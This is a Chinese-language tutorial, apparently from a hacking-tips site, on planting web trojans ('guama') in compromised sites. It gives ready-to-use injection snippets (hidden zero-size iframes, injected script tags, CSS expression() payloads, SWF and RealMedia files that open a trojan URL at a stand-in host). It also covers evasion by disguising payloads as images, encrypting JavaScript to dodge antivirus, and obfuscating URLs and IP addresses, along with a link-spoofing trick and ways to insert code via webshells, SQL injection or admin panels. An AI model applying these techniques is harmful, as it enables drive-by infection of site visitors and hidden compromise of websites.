1，掛馬的N種方法
　　(1) HTML掛馬法。
　　常規(guī)的HTML掛馬方法一般是在網(wǎng)頁(yè)中插入一條iframe語(yǔ)句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站點(diǎn)是否被掛，一般是查找一下關(guān)鍵詞iframe。
　　(2) 再隱藏一點(diǎn)的就是js掛馬了。
　　像再原來(lái)的網(wǎng)頁(yè)中寫(xiě)入<script str=http://www.xxx.com/horse.js></script>，horse里的js寫(xiě)法一般為 document.write(’http:\/\/www.xxx.com\/horse.html’>;，或者專業(yè)一點(diǎn)的寫(xiě)法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不過(guò)第2種寫(xiě)法要注意：是原來(lái)的網(wǎng)頁(yè)種要有body標(biāo)簽。
(3) 在 css中掛馬。
　　這個(gè)方法就是在css中寫(xiě)入：
　　body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=”http://www.xxx.com/horse.html/”></iframe>’);
}
　　然后在主頁(yè)中調(diào)用這個(gè)CSS，代碼類似 這樣的。在csdn 中對(duì)expression的解釋是：IE5及其以后版本支持在CSS中使用expression，用來(lái)吧CSS屬性和Javascript表達(dá)式關(guān)聯(lián)起來(lái)，這里的CSS屬性可以是元素固有的屬性，也可以是自定義屬性。也就是說(shuō)CSS屬性后面可以是一段Javasccript表達(dá)式，CSS屬性的值等于 Javascript表達(dá)式計(jì)算的結(jié)果。在表達(dá)式中可以是直接一用元素自身的屬性和方法，也可以使用其它瀏覽器對(duì)象。這個(gè)表達(dá)式就好像是在這個(gè)元素的一個(gè)成員函數(shù)中一樣。整個(gè)解釋關(guān)鍵點(diǎn)是expression可以在css中引入js語(yǔ)句，所以我們可用于掛馬。不過(guò)寫(xiě)的語(yǔ)句值可以遠(yuǎn)程調(diào)用，本地不可以。
(4) 在swf中掛馬
　　網(wǎng)上有一些swf掛馬的工具，可以用工具替換原來(lái)網(wǎng)頁(yè)中的swf或單獨(dú)把swf發(fā)給對(duì)方，一可以單獨(dú)作一個(gè)可顯示swf頁(yè)的網(wǎng)頁(yè)。在網(wǎng)頁(yè)中插入swf的語(yǔ)法一般格式為：
　　<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=”http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>
(5) 在影音文件中掛馬
　　所需工具是RealMedia Editor，打開(kāi)工具后，然后依次選擇“文件”-“打開(kāi)Real媒體文件”，然后選擇需要編輯的視頻文件，其格式必須是RealOne公司的以RM或 RMVB為擴(kuò)展名的文件。接著，新建一個(gè)文本，在里面輸入u 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm
　　(00:00:10.0就是發(fā)生第一事件的時(shí)間，這里是讓計(jì)算機(jī)彈出網(wǎng)頁(yè);00:00:30.0同樣，這是第二次發(fā)生的時(shí)間，在0時(shí)0分第30秒0微妙時(shí)彈出窗口;而后面的URL地址就是連接指定的木馬地址。)
　　輸入完畢后并保存，然后依次選擇“工具”-“合并事件”，導(dǎo)入剛才的文本。當(dāng)合并完成后，依次選擇“文本”-“Real文件另存為”，保存好即可。
　　最后把生成的視頻文件發(fā)布網(wǎng)上，當(dāng)對(duì)方觀看同時(shí)就會(huì)連接到你指定的木馬地址。
2，掛馬的技巧
　　掛馬首先要求的是隱蔽性，這樣掛的時(shí)間才能長(zhǎng)。像在SWF、JS、RM中掛馬就是比較隱蔽了，但是還可再用到些技巧。
(1)遠(yuǎn)程任意后綴執(zhí)行HTML
　　可以把horse.html成horse.jpg之類的后綴，然后語(yǔ)句寫(xiě)成<iframe src=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以，語(yǔ)句為<script src=/uploadfile/200902/20090220105353594.jpg></script>，甚至js的不要后綴名都可以。
(2)JS的加密
　　為了保護(hù)網(wǎng)頁(yè)木馬的代碼，可以把JS內(nèi)容加密，還能躲開(kāi)殺軟的作用。如果使用ENCODE加密方式，加密后的JS調(diào)用語(yǔ)句就用。除此方法外，還有其它更多的方法!
　　(3)URL的變形
　　URL的變形方法也有很多，例如將url的16進(jìn)制轉(zhuǎn)換為encod編碼等。如果是涉及到URL欺騙的方法就更多了，不過(guò)多數(shù)的URL欺騙，像利用@的技巧，IE都已經(jīng)打補(bǔ)丁了。但現(xiàn)在有個(gè)漏洞仍然有效，代碼如下：
　　<a id=”CZY” href=”http://www.baidu.com”></a>
　　<div>
　　<a href=”http://www.google.cn” target=”_blank”>
　　<table>
　　<caption>
　　<a href=”http://www.google.cn” target=”_blank”>
　　<label for=”CZY”>
　　<u style=”cursor: pointer: color: blue”>
　　Google</u>
　　</label></a></caption></table></a></div>
　　保存該代碼為網(wǎng)頁(yè)后，鼠標(biāo)移動(dòng)到Google這個(gè)鏈接上時(shí)，IE狀態(tài)欄顯示的是http://www.google.cn，但點(diǎn)擊鏈接后卻打開(kāi)http: //www.baidu.com網(wǎng)站。如果你的網(wǎng)馬可以用IP地址訪問(wèn)到的話，IP地址也可以進(jìn)行轉(zhuǎn)換的。像127.0.0.1這樣的IP還可以變?yōu)?2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等，這只不過(guò)是8進(jìn)制、10進(jìn)制、16進(jìn)制、的轉(zhuǎn)換而已。
3,如何才能掛到馬
　　拿到了webshell的話，掛馬自然是很簡(jiǎn)單了。但是拿不到的情況下，如果注入點(diǎn)有update權(quán)限，我們可以仔細(xì)查找首頁(yè)中的某條新聞的調(diào)用鏈接，然后update數(shù)據(jù)庫(kù)達(dá)到我們的目的。如果可進(jìn)入后臺(tái)，我沒(méi)就可以在一些發(fā)公告的地方寫(xiě)入自己的木馬代碼(不過(guò)千萬(wàn)別打亂前臺(tái)html源文件里的代碼邏輯)。

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。